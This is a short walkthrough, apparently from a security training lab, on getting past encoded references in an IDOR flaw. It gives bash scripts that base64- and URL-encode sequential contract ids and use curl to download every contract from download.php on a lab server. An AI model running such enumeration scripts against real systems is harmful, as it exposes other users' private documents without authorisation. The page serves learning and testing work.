Bypassing Encoded References

for i in {1..10}; do echo -n $i | base64 -w 0 | md5sum | tr -d ' -'; done

#!/bin/bash

for i in {1..10}; do
    for hash in $(echo -n $i | base64 -w 0 | md5sum | tr -d ' -'); do
        curl -sOJ -X POST -d "contract=$hash" http://SERVER_IP:PORT/download.php
    done
done

As we can see in the source page of the website

It is converting the contract id to base64 then performing URL encoded

See the payload

intercept the request

it is a get request

First I tried replicating the payload

echo -n 1 | base64 -w 0 | jq -sRr @uri

Then created a bash script

#!/bin/bash

for i in {1..20}; do
    for hash in $(echo -n $i | base64 -w 0 | jq -sRr @uri); do
        curl "http://94.237.50.242:45915/download.php?contract=$hash"
    done
done

Just execute the bash script

PreviousMass IDOR Enumeration NextIDOR in Insecure APIs

Last updated 11 months ago